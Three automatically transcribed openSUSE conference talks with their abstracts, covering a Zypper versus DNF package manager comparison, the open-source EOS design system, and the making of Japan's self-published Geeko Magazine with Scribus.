actually do the equivalent of zippered up on a tumbleweed system. I actually already pre-downloaded the whole transaction because, well, it took like seven hours in my hotel room to download everything. So I figured I didn't want to trust Wi-Fi to work or something like that. So I should also kill the test transaction part. Let's see. So I'm also using a short form here, desync. I could actually, if I wanted to be super clever, we'll just use dup. So dup. So that shows all the stuff that's going to happen. It's going to install 160 packages, upgrade 1.5K of them, remove and downgrade a few, do a thing. Already downloaded all of it. So it's going to run a transaction check and actually do the thing. And then, meanwhile... And then over here, I have DNF-Degora set up to install some things. I've checked a few packages and then build transaction. This is why you don't do demos. Let's see here. There we go. Now it shows all the stuff. And so this is... You know, it's basically the same kind of output you'd see from the CLI or if you're familiar with the ask, you'll see something like this when it's about to propose a transaction to you. It's just going to make me type in my password again. And now it's going to download... Wow, the Wi-Fi works here. So it's downloading packages and it's going to do stuff while that's happening. Then over here, you can see it's doing basically the same thing. It's upgrading the packages, running through the scriptlets and stuff. Actually, something that I learned while I was doing this, we run a lot of scriptlets during an upgrade in OpenSUSA. Like, a lot. Far more than I actually expected to. But it was an interesting exercise because it showed that, for one, OpenSUSA does do stuff the right way because even swapping from Zipper to DNF, things work fairly well. You can see all the output. It does all the right ordering and installation and stuff. It's nothing too special or crazy. Actually, this virtual machine has been upgraded like three times using DNF rather than Zipper. Nothing has exploded so far. So, we'll just go back to this. Beach ball of doom. All right, so since that kind of shows what was going on in there, the kind of conclusions I came from this was the DNF package manager and the Zipper package manager are actually fairly comparable at this point. In terms of user experience, performance, and usability, they're pretty up there. They're pretty good with each other and they're pretty good as package managers as a whole. I'm a little bit disappointed when I looked at how the sausage was made for Zipper, like how some of the stuff actually worked inside compared to, maybe it's again part of the fact that Zipper is so much older and they trusted the underlying stack a lot less. But it's a little bit weird, the kind of hacks that are in there that I feel like somebody should take a second look at and maybe think maybe they're no longer needed to work this way. Another thing that was sort of a thing was it feels like somebody needs to care about developing a little community around it. Zipper is a perfectly serviceable package manager and it's totally a good replacement for a lot of subpar package managers in the RPM ecosystem. But it seems like there's not much attempt to really drive adoption or usage of that. Supporting plugins and extensions is hard and zip is, well, fill in your own word but I would say zip is pretty awesome. For the DNF side, the architecture is kind of complicated. It's a little hard to follow how all the pieces fit together. On the flip, I think the community is pretty strong. That's maybe partly my fault but there's a large number of people that are actually using it and building tools around it and doing things like that. The language binding support beyond Python is still missing and I think it kind of comes away that DNF makes you really not suck. It has a good CLI interface. The performance is pretty good. The extensibility is awesome and generally I enjoy it. You shouldn't have to say like I, it's not that I don't want to say I love working with my packages all the time but it doesn't make it a chore to deal with all of them. In summary, I guess Zipper is probably still slightly up there higher than what DNF is but I think there's potential in both ways. There's still a bunch to learn from both of them. DNF does certain things a little bit better than I think Zipper does and vice versa as I've kind of mentioned earlier. Questions? Okay. Yeah. So the question was, is there, to simplify this, is the question was, is there an RPM based package manager that does source to binary reproducibility for verification before installation? The answer to this is no. One, that is extremely expensive. That requires setting up build routes or worse, installing all the build dependencies on the computer first before installing the, before building it and then installing the real package at the end and then probably figuring out a way to track all the build dependencies to remove afterwards because you don't need them. Two, it's not strictly necessary most of the time. Most people who are building RPMs are hopefully using a build system that's worth a damn like OBS or Koji which provides source to binary guarantees and reproducibility that lets you make sure you are not doing dumb things in your packages. And usually the repository metadata can be verified to ensure it's not tampered with either through checksums, meta-links, GPG checks or a combination of those. And with that you can usually trace from there to the binary package, check the checksum and the signatures of those and then install there. So you have enough paths of verification that it's usually not necessary to go down the extra mile of rebuild and then install to verify the reproducibility there. Usually that's the kind of stuff you'd want to do server side in a build farm like in an OBS or Koji setup. But there are bits and pieces of that functionality in both package managers. Zipper has a function called source install which allows you to download or point it to a source RPM and that will go and read it and install all the build dependencies and unpack it into an RPM build directory or whatnot so that you could just go ahead and build the package yourself if you'd like. DNF has the build depth sub-command which allows it to read a spec file or a source package and install the build dependencies and then you could do whatever you want there but it doesn't have an equivalent to the source install functionality. It might get it someday but right now it doesn't have it. But that's kind of the closest you get. Other package managers like URPMI, user RPM from Mantriva, they have the ability to download and unpack just like Zipper does. Apped RPM doesn't have any of this functionality. It really tries to ignore the fact that source packages exist. And Pull Deck and others are just kind of waffly on what to do with this kind of thing. So it's not really a thing that a lot of the RPM package managers concern themselves too much with. Yeah? You mean group installation as in like installing from using one command to a bunch of computers at once? Or do you mean installing a bunch of packages? The latter. Okay. So group installation in terms of installing a bunch of packages. In the DNF stack you have this through the composition groups or comps groups as a lot of people call it. And now with the module MD, so the module metadata and the comps groups, what they are essentially are metadata files that describe a set of packages that belong for a specific role or type or some logical grouping of some kind that a user may want to act upon. So they want to install it or remove it or upgrade them together or something like that. Zipper has this kind of similar behavior with patterns. It treats the meta packages slightly differently in pattern mode and tries to accomplish the same behavior. And the reason it used to be that patterns were special metadata like comps groups were, like comps groups are, sorry. But nowadays it is just meta packages with fancy labels and stuff inside. But essentially both package managers provide that kind of functionality. For zipper, it is zipper install dash t pattern, name of pattern. And for DNF, it is DNF install at sign name of group or name of module and it will go ahead and do the thing to install a collection of packages together. And it tracks those collections as they are installed, uninstalled, upgraded and whatnot. So you will know whether a package was installed as part of a group or if it was installed individually. Yeah? So good question. The question was, does DNF have any special behavior for handling when a user explicitly removes a sub dependency or a weak dependency, weak installed package? The answer to this question, unfortunately right now, is no. However, because DNF tracks the reason in which a package is installed and actually already has the information to make these kinds of decisions, the only reason right now it doesn't do things like automatically excluding a weak installed package that a user has explicitly removed is because no one has written the logic to do that. Like all the pieces are there, it is just the filter is not actually wired up yet. There was actually an effort a couple of years ago to redo how DNF stores its reason information. They now call it software database. It used to be a descendant of the YUM database. It is essentially a database that tracks all the transactions that have ever happened and also indicates like how the packages were installed and why. And that information also tracks when users decide to say I don't want this anymore and you uninstall it, it records that reason as well. Those reasons are currently not fully factored into the dependency solving but they could be. And if they were, then you could get more intelligent results out of that. Hello. Hello. You talked about DNF's module functions. Does it support any higher level functions for example dependencies between modules or comps or for example registering enterprise modules? Yeah. So unfortunately it does. So modules actually export the same level of interfaces and manipulation APIs that packages do. So you can install, remove, update, query them and modules can have module level dependencies. The way that the module stuff works is it's kind of a layer. You start with a repository layer at the bottom which has a super packages. Then you have module MDs that say these buckets of these soups of packages belong with these and then the buckets of packages inside are handled. So each layer it goes all the way down and DNF basically handles each of those as if they are like a package and you can do actions and things like that. Okay. So those are resolved using Libsolvn. Libsolvn knows nothing. Okay. Unfortunately, Libsolvn knows nothing right now. Part of this is because a lot of the behaviors related specifically to modules are not fully fleshed out to the point that we can start figuring out how they should work in Libsolv. Because it'd be unfair to everybody if we implemented it once and then it turned out like six months later, we have to change everything again. We kind of want to have a solid idea of how it's supposed to behave across the board before we want to do something like that and make Libsolv actually fully aware of them. For now, from Libsolv's point of view, it looks like DNF is saying I want to disable all these packages or I want to enable all these packages. These are in these filter groups. These are considered higher priority but it doesn't know why from the Libsolv point of view. Can you do anything like enterprise registrations of REL using DNF for a plugin? Yeah. I mean, the subscription management, sorry, the subscription management functionality has been integrated into the lower levels. So, for example, Red Hat subscription management actually now has a C library, LibRHSM, which is plugged into the LibDNF library as a plugin. And so if you are on a REL system, that plugin is built in and it will track your entitlements status and regenerate the Red Hat.repo file that is installed on there to include your repositories that you are entitled to. The subscription manager tool from Candlepin is the one that manipulates the settings for that and that's a Python program that lives a little bit outside of it. But it also wires into the DNF front end through its Python API to make sure that those things are all coherent. This should be done slightly more smoothly but that takes a little bit of work of figuring out how the interactions between the package manager and the entitlement management system need to be rationalized, especially in the part about handling a transition from talking to RHSM directly and talking to and switching over to a satellite system or a SUMA system or something like that. Any other questions? Okay. Well.
In one corner, we have Zypper: the successor to the motley of package management options from Ximian and SuSE. Created after the merger of the Ximian and YaST package manager teams, it was a pioneer in using the SAT solver for package management and proved that it worked well at scale in a large and popular Linux distribution platform (SUSE Linux). It spawned the development of libsatsolver, which became libsolv. Considered by many to be the most advanced and fastest package manager, it is created a class of package managers all on its own. It is used in openSUSE, but is also available in Fedora and other RPM-based Linux distributions. In the other corner, we have DNF: the anointed successor to YUM (Yellowdog Updater, Modified). DNF (Dandified YUM) was forked from YUM to rework the internals to leverage libsolv and offer a saner, more maintainable API. Forged from the blood, sweat, and tears of many package manager developers from Red Hat and others, DNF is built with the lessons in mind from the last decade of software and systems management experiences. A new up and comer, it is used in Fedora, Mageia, OpenMandriva, Yocto, and others. It is also available in openSUSE. How do these two package managers compare? Are they more similar than different? Has DNF made YUM no longer a trash heap? Does ZYpp still rule the roost? This talk explores both package managers and compares them from a technical, usability, and ecosystem perspective. Who knows? Perhaps there are lessons to still be learned for evolving both package managers.
10.5446/54404 (DOI)
to start. Okay, hello, everyone. There's a lot of people still coming. We can start in 30 seconds, actually. Welcome to the OpenSUSE conference. This is our very new product in the OpenSUSE industry. This is why we are introducing it to the world here, actually. Hello. Hi. Hello. Yes. Hi. So, yes, welcome to this presentation. As Cynthia said, now we're going to introduce ourselves, actually. It's our first time we have a presentation. It's our first time we present this to the world. So, let me introduce myself. I'm Jesus. I'm UX developer and scrum master for the EOS design system team. I live in Barcelona. I was going to make a joke about the weather. Barcelona being very sunny, not here, but it's super sunny here, so no jokes. Very nice weather today. And, yeah, we, I work designing and developing components for the design system that are ensured that products at SUSE and other open source products have coherent user experiences. My name is Cynthia. So, I work for SUSE for six years, at Moles. And I actually started with this project of creating a design system for SUSE initially. I'm actually the product owner of the EOS design system. I'm also a front-end developer, UX designer. I do a lot of things here and there. And here, well, today, actually, we're going to start here. Today, we want to take you into a little journey, so you understand how we actually understood, we found out the design systems are the solution to providing good experiences to our customers. So, software is seeding the world. That was a phrase that was published in the Wall Street Journal in 2011. And it was a phrase that actually was making a lot of noise out there, because by that time, a lot of, our industry had to start to adapt and understand that software was becoming a core part of our lives. And today, actually, we cannot do a lot of things without software. And actually, this phrase is a reality. Without software, we cannot really do our daily tasks and not even work at all. And we can see that one of the things that happened when this phrase was actually published in the Wall Street Journal, our blockbuster was actually kind of collapsing by then, and Netflix was eating the blockbuster. So, the industry was really being disruptive, and that actually happened. But something else is happening right now, and it's the design is seeding software development. At the same time, there are some other revolutions that are happening out there as well, right? So, one can say that virtual reality is also eating software development, or one can say that augmented reality is also eating software development. A lot of things are disrupting the way that we do software today, but one of the things, and today we can focus on design. And why is this? It is because a lot of companies and the industry actually realize and we understood today that in order to make better software, we actually have to provide better experiences. And design and UX experience actually will help us to deliver good quality of experience of products to our consumers. So, we have a lot of companies in the consumer world actually understood this, that they are still investing a lot of money into creating good and better experiences. Some of them, I just mentioned a couple, Facebook, Uber, Airbnb, and so on and so forth. A few examples here, for example, the way that Facebook is one of the biggest content managers, content databases in the world, they actually don't create anything. The consumers are creating it for them. And that's because software and the experiences they provide to us allow them to gather all that information. And the same happens to everyone else. And this is another reality as well. So, this is a generation, this is a two-year-old. And this is a video that the father made in which actually he's showing the kid is trained in Zoom, an image. This video actually became very viral. It was seen everywhere. And the thing is we actually have to pick up the pace a little bit with this revolution, with how we enhance experiences and how we make our products better. Because today, so there was a lot of different generations and every generation is known for different things. For example, the millennials are known for being very good multitasking and we understand processes maybe in a different way that it was for the baby boomers, the previous generation. But now this generation, which is the generation set is called, they were actually born with all the software that we have today. So there's another reality here. And it's when you create software, when you design software, design our products, there's one essential thing that we have to look into and we have to fulfill user expectations. So the more that we use software, it's more that we can use the certain patterns for software and the more that we expect to see those experiences from one product, let's say from Google Maps. Google Maps has a certain way of showing us direction. If you use another product for taking directions to come to this conference, for example, you kind of expect the same patterns and experiences. That's because it's actually wiring your brain. These experiences, these interfaces are getting to you. And like I said before, there's a new generation coming as well that we actually, we should never forget the new generations. They disrupt our markets. They disrupt the way we do things. And we should pay close attention to this generation that's coming. And actually it's not so far away from us because if we consider people that were born in 1996, they're 21 years old, more or less. And they're already among us. And they already are more experienced than we are. And that's true. We have to understand that the young people may know things sometimes better than we do. So we have to invest in our experience. We have to improve the way we deliver experiences to our customers. But then, okay, it's maybe not so hard to understand that we have to implement good and deliver good experiences, deliver good UI in our applications, but there's another reality. And this is another reality that came straight into our faces. Oh, it's not playing. Yep. So we got this face lab. And we are in a very specific industry, open source, and enterprise software. It works in a very different way to the companies that I was showing before, Facebook, Uber, Google, Airbnb, anything like that. Anything that is consumer oriented. They have some priorities and prerogatives that we don't have. We don't have the time normally to deliver things and we have to ship it as soon as we can so we don't lose customers. We have different customer bases as well. We have people that are more experienced and sometimes, we tend to think that we don't have to deliver such good experiences or such good interfaces because they're experts and they know what they're doing. But that's not really the reality today. So that's how it was a long time ago. One would say that enterprise and open source software was far, far ahead in terms of user experience in comparison to consumer oriented companies. Now today the cap is closing. We have a lot of companies out there that are investing a lot of money. They have the money to hire thousands of designers and UX experts and all that. But there's also a better way to do this. And like I was saying, a lot of companies have the money and they have the budget to hire people but actually scaling design through hiring is not really the only way to do it. You can also improve your processes. And this is why design systems are so hot right now, like it says here. Design systems, I'm sure that you all heard at some point that a lot of companies are investing in design systems. So yeah, we are one of them. And what is a design system? So design systems are a centralized source of information. But a lot of people tend to think that because it has a word design in it, it means it is for designers. But that's not really true. A design system helps developers and designers. And to be really fair, it helps more developers than designers. It provides and delivers cohesive experiences. So that's the whole point of a design system. It has all the tools that you need to provide an experience that is consistent through all of your product portfolio. Let's show you a little scenario of a company with free products in this case, how they work without a design system and with a design system. So basically this will be more or less a setup of a company that has different portfolio, different products. And you will normally have a designer product working with the developers directly. But then as you see here, so I just made a very basic example of a close button, that is actually what happens in the end. You have groups of people working isolated in this way. The outcome tends to be the interface and the experience for your consumers. Because we always have to think about the customer and the consumer of the application. It's different. So we have this red, the black, and the blue button. This is just a silly example, of course. But the bottom line is growing inconsistency is more expensive to test because in this case, we had to test the first one for this product, the second for the other products. We are testing each sign, the same component for every policy. It actually becomes expensive. It's non-collaborative because we have every designer is working isolated in different ways. So actually, if you actually try to fix that, we try it. It's a lot more complicated and it's really frustrating for designers to have to try to align when you have different use cases and different products and you have different agendas and different products. So that's what you get. And something else, actually, I was almost forgetting to say, is non-reusable. So that's one of the main ways of money, I would say. So the company is creating something for one product. For example, the first one, why didn't we just use these in the other products? Well, maybe because the agendas were not the same, maybe because the use cases were not the same. But with the design system, everything goes to the source first. And this is how we save money somehow. Because in the end, we are saving development time, we are saving testing time. But what we really need to focus is the consumer has this same experience in all of the products. And like I said before, so this is also a streamlined collaboration between designers and developers and designers, and everything goes to the source. There's not so much to discuss really. It has been tested, it has been discussed previously before it goes into the product. So it's a lot of money and time saved. The structure of the design system, just so you have a rough idea, we have a lot of examples of assets, icons, typography, components, templates, modules, guidelines, how we talk to our consumers, how is our brand interpreted by the consumer. And like I was saying before, this is not for one or the other. It's not just for designers, not just for developers, for both. And normally what we get out of a design system is we get the components that the developers need, and normally it's just a front end part, back end is never included. And we get all of the design pieces, because designers also need to continue growing their products and the design system as well. But everything is in one place, and everything is tested in just one place. And now, actually I'm going to give it to my colleague. So as Cynthia well explained, the design system is a great way of actually breaking away with the silos where we can't really ensure that there is coherence between different teams in terms of UX and UI. But it's also true that developing a design system... Oh, does this work? No. Oops, there you go. Developing a design system takes time and money. There's a whole process of research and development behind a design system. Initially, there's a step where components are defined, where we try to identify areas of our interfaces where we need to ensure that interaction with our users is meaningful. And then, of course, once we identify these issues, we want to solve with a design system. There's a whole side of research where feedback is gathered, where we speak to our users, where we look at analytical data, and we define different elements that will compose our design system. And that, of course, translates into money. It's costly. And it's clear to us that many projects, many open source projects, organizations, small and medium-sized businesses probably don't have the resources at the human and financial level to actually build their own design system. And this is why it's not working. Oh, okay. Sorry. And then there's, of course, the whole issue with scalability. Let's say you're building your own design system. You want to have a set of rules that actually make sense for your interfaces and break away with these silos we mentioned before. But then, of course, your interfaces evolve. New features are added. You may pivot the whole purpose of your project. And that means revising, again, your design system, going through them, and making sure that you don't define components redundantly, that everything is reusable. And that's something, again, that it's not probably easy to assume by to actually... I'm sorry. It's not something that you need resources for it to actually be able to handle and to maintain this design system. And probably many organizations don't have these resources. So why do we build EOS? What's the reasoning behind it? We want to build a design system that's customizable, which means that you just can go on our repository, you can clone it for KIT, and easily apply your brand to it, your brand, your project, colors, whatever. It's just very... The idea is that it's easy to customize by anybody. We want it to be scalable. We want to be able to actually add features to it easily. And we, of course, want it to be open source, which is, to us, what makes us different from other design systems. Our idea is to be the first open source customizable design system. We leverage... We use open source technologies on our daily basis. I think we all do. And for us at EOS, I think it's important that we give back to the community and encourage everybody to actually collaborate and help developing an open design system. We strongly believe in the idea that you exist for everybody, not just big enterprises. As Cynthia mentioned before, there are big enterprises who have massive amounts of resources and tons of designers and developers working on a design system. But that's not the case for the majority of us. We want good UX for open source. Any project you may be working on, you can just leverage our design system, EOS design system. And we also want to encourage you to go beyond the framework. What do we mean by this? Usually, if you build your web interface, you use technologies like libraries such as... frameworks such as Bootstrap, for example, which already provides you with a set of components and different UI elements. But what it doesn't give you is really an understanding of how do you use these components? How do you interact with your user? What does work? What doesn't? How do you communicate with your user? That's what actually makes our design system different. What actually is the added value of a design system. I'm sorry. Apologies. And of course, as I said before, we wanted to be open to everybody. We think that there's a lot to give and a lot of feedback to take from the community. And this is why we already have contributors on our project and we take feedback from them. And we collaborate closely with them. Yeah, that's great. What have we done so far? How far did we get with this? We are at the early stage of customization. What do I mean by this? Our idea was to... EOS is the design system for SUSE. The main purpose of it initially was to actually ensure that there's coherence and consistency between EOS products. So, as Cynthia, the example she gave before, if you have different silos, different teams, that develop a button, for example, it translates into different styles of buttons for products that actually are from the same company. So that's something that we managed to do. And then we wanted to prove that EOS is customizable and this is how we actually also deployed the Open SUSE design system. So, basically, it's a fork of ours, of EOS, but with the branding of Open SUSE. And the proof of concept is there. We prove that it can be done. You can just customize the design system for your needs. Now the idea is to take this beyond proof of concept. What we want to do is we want to be able to customize it completely, which means adding content management system, for example, where once you start using EOS as your design system, you can easily add new components to it. And it also makes it accessible to designers and everybody who may actually work with it. And what does it look like? So, as I said before, I'm going to do a quick demo now. I'm going to show you a couple of components, but I encourage you to also visit this URL. So, this is the EOS design system, let's say the main design system. And then, of course, we also have the Open SUSE flavor of it. Yes. Okay, so... Let me just leave this here. So, I'm going to demo EOS, mainly because this is, let's say, so we work on different features. And I'm going to give you a few examples of how it works, what makes it different to a framework like Bootstrap, for example. And I think a good example of this would be, for example, alerts. So, basically, many frameworks, many UI frameworks actually come with these components. So, you have alerts defined, how they look, the states, etc. But what they don't do is they don't tell you how to use them, where to use them, and you sort of, you know, be aware of the different contexts where you can use them and then ensure that they are meaningful to the user. So, an example would be, so there are different alert types. So, there's a global alert, and a global alert is something that will appear at the top of your application, your web application. And then, basically, what you see is there's always a short description of how to use them, what kinds of actions they can include, whether they can be dismissible or not, things that actually do matter, depending on the context of each case scenario. And then, of course, what you see is that we've, as I said before, we are actually using Bootstrap as a base. So, it's not like this is in the framework for UI only. So, the idea is that, using Bootstrap, you can also sort of use this on top to actually just simply copy the example and just add it straight to your application, so that this is an example. So, you see there's different... So, if you...of course, something I just forgot, these are code examples, but then, at the same time, there's also specifications for it. I mean, the idea is that this is used not only by designers, but also...not only by developers, sorry, but also by designers. So, in the end, you have a full set of specifications. The information you need to actually be able to implement these elements in your interface. I'm just going to give you another example, if I can. But it's not all about design. It's also about things like how we communicate with our users. So, for example, we have writing guides. So, what are these writing guides? So, there's... When you have an interface that actually speaks to the user, let's say you have an error in a pop-up or whatever, any kind of message you send to the user, it's important that you define a voice. Are you knowledgeable? Are you too aggressive when you speak to your user? So, we provide... What these guides provide is actually a sort of set of definitions of how... For example, this is for Susie, so how you should sound when you speak to your user. So, for example, in our case, what we define, this is something we researched on and we spoke to different teams to, and this is the outcome of it. So, we are experts, not too bossy, we're friendly, but we're not informal. That's the idea. And then, once you define your voice, it's also about the tone. And then, we have conventions and rules. You can drill down two things like acronyms, for example, how you use acronyms, and this is something that is always... We work closely with other sides of a product, for example, branding, marketing, for example, and then the idea is that this is something that you don't need to define for your project, because it's already here. And it goes on and on. There's other great examples and colors would be another one. This is... Here, we define the color palette, and we also give a guideline on how to use these colors. What works in terms of contrast, for example, and this is great because it means that you already have, in this case, you have variables for preprocessors, CSS preprocessor, but you get an idea of what works and what doesn't. So you don't get... You don't mix... You don't have a text with a dark text over a dark background, for example. So, yes. And then there's... Should we show perhaps icons? We have only three minutes. So, yes, that would be it. Please, I encourage you to have a look. Just access the links on the slides, and that's it. Yeah, well, yeah, this is all for the presentation that we have. I'm also sure you've managed to see actually all the time we have the links here, down there at the footer. So if you want to get in touch with us, if you want to try out what we have, there's a... You have the links there. eosdesignsystem.com. That's the URL. We have Twitter. We have a lot of other things. Just get in touch with us, get in touch with Jesus and myself if you have any questions. But we really encourage you to collaborate with us because we're not just building the SUSE, our design system, many thought actually. This is open source, and we are helping as well the open SUSE design system. And we kind of need a little bit of help there. So the more help that we can get, the better this product is going to become. So, yeah, I think that's it. Please come over to our table. We have some really nice stickers, too. So please come and grab one. Yeah. So thank you very much for coming. It wasn't so bad. Thank you. APPLAUSE We don't have time for questions, just so you know, because there's another talk we're starting right now. So if you have any questions, just come to our table. Yeah, thank you. Bye.
In the past UX design was a commodity in the paid consumer world, where companies like Facebook, Google, Uber would invest millions on. Today the gap is closing. Enterprise and Open Source applications are in need of better UX too. On the other hand, many companies of all different sizes struggle with today's IT agendas: bleeding edge software, agile development, short time-to-market, etc., and this "new" (and really not so) kid on the block is not making it any easier for developers and designers to keep up: UX design. Companies struggling in this scenario will eventually suffer from a big level of inconsistency in their products portfolio, and sometimes even in one same product. Design Systems can help solve this problem, and a few more. Design Systems serve as a centralized source of information for UX, UI, and other brand-related guidelines that help not only developers find the UI element or component they need, but also designers to build faster prototypes while streamlining the collaboration between the two. But, building a Design System can take a very long time and be very expensive, this is why we're building EOS: an Open Source and customizable Design System. In this presentation, we will talk more about the problem Design Systems solve, how we are building EOS, and how it can be of great benefit to your company or project.
10.5446/54405 (DOI)
Okay, good afternoon everyone. Thank you for coming. Today I'm talking about Giko Magazine, which is a series of technical magazines about open souser and it's published by the Japan Open-Souser group. So before starting, let me introduce myself. I'm Fumino Mutakiyama. My open souser ID is Etake and maybe you've already noticed I'm from Japan. And I'm one of the organizers of Japan Open-Souser user group, which is a local, so, Linux user group. And so I often attend local conferences and have a booth and talk about open souser. And so, also since 2014, I'm a member of Open-Souser Asia Summit Organizing Committee. And in 2017, we had Open-Souser Asia Summit in Tokyo, Japan. And as a conference, I was the chair. And so here's today for the interesting next Open-Souser Asia Summit. So next Open-Souser Asia Summit is held in Bali, Indonesia. So the important thing is the Koroko paper is open until next month. So Bali is a very good place to visit because it's a tropical resort area and many historical places. And also, important thing is, this photo is taken in 2016, the last time Open-Souser Asia Summit was held in Indonesia. So there in Indonesia, there is a big community. So as a conference, 500 people come to the Asia Summit. And so committee guys are very enthusiastic and very hot and friendly. So yeah, I recommend to visit Indonesia and have a talk at the conference. So then I'm a package maintainer of Open-Souser's MS-70N project and maintaining some input methods or a package related to points. And by the way, so I'm not working for Souser. I'm a community developer. And so my daily job is working as a house of their consultant in Japanese civilian infrastructure platform products company. So today's topic is Gikomagazine. So is there anyone who knows about Gikomagazine? Thank you very much. So Gikomagazine is a technical magazine or Open-Souser. So it contains many technical articles related to Open-Souser. And also it have some contents like Novels, which is not non-technical, but Novels is related to Open-Souser. Yeah, it's very fun. So here is one copy of Gikomagazine. Gikomagazine is so B5 size. B5 Japanese, we use the Japanese special size, but it's between A5 and A4. And it have about this issue. We have 44 pages and we are selling this book in 500 yen. It's approximately 4 euro. So why do we publish Gikomagazine by ourselves? One reason is commercial publishing, so technical commercial magazine does not mention Open-Souser. They tend to write about many CentOS and Ubuntu, so they don't write articles about Open-Souser. So we decided to make our own magazine, which have many Open-Souser articles. Of course, it's fun to make magazine by ourselves. So please look at this picture. There are many covers of past Gikomagazines. So on the covers, we can usually find personified, so human-like chameleons, or some stuffed chameleon toys. So why are there two types of covers? The reason is very simple. So we cannot find a good painter of those years. In such case, I take photo of my Giko toys and put it on the cover. So what contents of Gikomagazine like? This is one page of Gikomagazine 2018 winter. The title of this article is Building Kubernetes Cluster Using Cubic in 10 Minutes. This one written by Ashiota-san. And he will talk about Cubic and software-defined storage after this session. This one is Let's Start High-Speed Packet Processing with DPDK. Yeah, very crazy. Tenron, this article is written by Imaxel. He's a very young guy. And he loves packet processing. So every time he write about some articles about packet processing. So this is of this article about packet processing is very popular among readers. And the last one is how to use Google Drive. A promo for this. This one is written by Rippon-san. Maybe you know, we have several approaches to use Google Drive. For example, one approach is using KDE integration or GNOME integration to access Google Drive. So this article explains such ways to access Google Drive and compare them one by one. And he also write about OneDrive before this issue. At that time, so many people say that, why you introduce OneDrive? Why not Google Drive? So he decided to write about Google Drive. As I mentioned, Gecko Magazine is not commercial magazine, but self-published magazine. So it is distributed by not by publishers, by ourselves. So let me explain about self-publishing culture in Japan. So in Japan, there are many groups or individuals who are doing self-publishing. For such people, there is an event called Comiket. Also, Comiket is in short, full name is Comiket. One knows about Comiket here. Comiket is a huge kind of festival. At Comiket, we can find some comic events, so we can make comics. And also some novels and music, many kinds of stuff. And so Comiket is held every half year, August and December. And it's very huge. And every time, half million people come together to the biggest event hall in Japan in three days. And we have a booth at Comiket. So this is the picture of our booth. The booth is not so big because the space is very limited. And there are about five groups around us, also writing technical books about some source applications. So the market of self-publishing is now growing in Japan. In 2016, another event called Takebook Fest just started. So this Takebook Fest, for this Takebook Fest, 470 groups, or individuals writing technical books, come together. And 1,000 visitors come to buy self-published books. And Japan booths have a booth twice at the Takebook Fest, but it is now difficult to get a booth because too many groups want it to get a booth at the Takebook Fest. So far, I talk about Gigo Magazine and Japanese self-publishing culture. So from now on, I talk about how to make Gigo Magazine. The first step to make Gigo Magazine is call for articles. The articles on Gigo Magazine is written by three or four members of Japan Opsu the user group. To collect articles two months before comicate, I post a message, a simple message to our mailing list to call articles. It's like if you have some topics for next Gigo Magazine, please reply title and expected number of pages to me. This is just, this is all I write for call for articles. And by the way, what is return to authors? The only return is the authors can get copy of Gigo Magazine after comicate. So authors cannot get money, for example. So it's like contributing to open the week or something like that. So second step, then each author start to write the articles and first, so first they start to write a draft. We have a template for template in open document format, so they use library for writing draft. The drafts are reviewed by all the authors, by each other. So this picture is a screenshot of draft. I sometimes write many comments or ask them to fix. So this article has many comments. So yellow box is comment feature, from comment feature of library office writer. So the author can fix. So if the author, even if the author are not familiar with writing technical articles, but they can get some other prices from other authors than me. And maybe so he can challenge to write technical articles. So after reviewing, the third step is design and making pages. So this is my job. And from now on, I don't use library office. I now use Scribas. Scribas is a publishing application. And I mentioned it in detail later. So I copy text and images from library office and place them onto the page of Scribas. So this is important because this allows to keep the design consistent and consistent among all the articles. So finally, so step four is printing of magazine. So to print our book, I send PDF data to generated by Scribas to a print shop. So to print the magazine, it costs about 300 euros for 150 copies of 48 pages book. And it takes about two weeks to print. So we print the book directly to communicate booth. So we just receive then at the booth at Comiquet. So from now on, I talk about technical some more detail how to make Gikko magazine. So our challenge is to edit Gikko magazine with free library open source software running on open source. So we don't use, for example, popular products like Adobe InDesign or Illustrator. So firstly, we use open source fonts. And then we use open source applications such as Krita and Scribas. So today I will talk mainly about Scribas. So the first component in the fonts, we need some fonts to write, to make a book, of course. However, in 2014, when we made the first issue of Gikko magazine, there was no choice among Japanese open source fonts, open source, so cellophane, so sans fonts, with enough quality. But it was IPA EXMintro for cellophane and Mplus fonts for sans fonts. So this is because Japanese letters, so maybe it's very complex characters. So Japanese font tends to be expensive. And this IPA EXMintro is font distributed in open source license, but actually it's not developed in open source way. It's provided by government. And Mplus font is developed in open source way. And now this situation is getting better. And now we have Advisors Hansel fonts and also known as Google Not Cjk font series, which is high quality open source fonts with much weight. So from the last issue, we are using not cellophane font and Mplus font. So then we use Scribath instead of Adobe InDesign. Scribath is a powerful desktop publishing software. And of course, it is open source. We are now using 1.5X SVM head for Gikko magazine. So what is special and different from applications such as Libreos writer? Firstly, Scribath supports CMYK color, which is necessary for offset printing. And then it can export PDFX format, which is a strict version of PDF. And it is also necessary to send our data to print shop. And finally, it supports TrimMax and Bleed. Those are also important, but I'll explain in detail this slide. So look at this picture explaining TrimMax and Bleed. And Bleed is earlier printed but trimmed out. It's necessary when we place an image at the edges of a page. And on Scribath, the area outside of this red line is Bleed. And TrimMax is a mark indicating where is Bleed. So when writing a PDF data from Scribath, Scribath automatically adds these three marks onto PDF pages. So as shown in the third picture, after printing, Bleed is trimmed out. So however, the first time I tried Scribath, it only provides very limited Japanese support. So it's because Japanese is quite different from languages, for example, in Europe. So supporting Japanese is very difficult. So even Microsoft Word and LibreOffice Writer does not fully support Japanese text layout thing. So if you're interested in Japanese type setting, there is a very huge document from W3C. And so what we did, so we went on open source way. We improved Scribath together with upstream community. We are very lucky because after we started this Gigo magazine, in Scribath project, there is a sub-project of Scribath, CTL project, just started. CTL project is aimed to improve and rewrite Scribath score engine to support complex text layout, such as right to left languages used in Arabic, and also they aim to improve CJK support. I helped to improve CJK support and send many feedbacks and wrote only a few code. So since we had a very excellent committer from maybe he's Arabic native, so yeah, I just, so it was okay to send, just send feedbacks. He wrote many code for me. What is difficult in implementing Japanese and so CJK, Chinese, Japanese, Korean support? One major difference is text justification. So text justification is a feature to align text at the end of time, so which is necessary for writing books. One major difference in CJK and the European language is there's no space between words. So Scribath cannot adjust the end of line by extending spaces. So what we have to do for CJK text layout is Scribath insert implicit spaces, so in other, so all spacing between every character of, every CJK characters. And then, so the end of line is now aligned. So Scribath 1.4, which is a stable branch, does not support this CJK so justification. So first time I made Gecko magazine, I put some patches from 1.5 branch and applied to 1.4.4. Now we are using a screen head, so containing, so it's okay because those fixes are already merged. In this side I want to introduce another improvement, which is spacing between CJK and Latin letters. So to keep a clearance, we usually add a quarter space between CJK characters and Latin characters. So this one is a screenshot of first implementation. So in this implementation there is a space after E of open-sensor and Japanese letter 1. Yeah, it's okay. And second 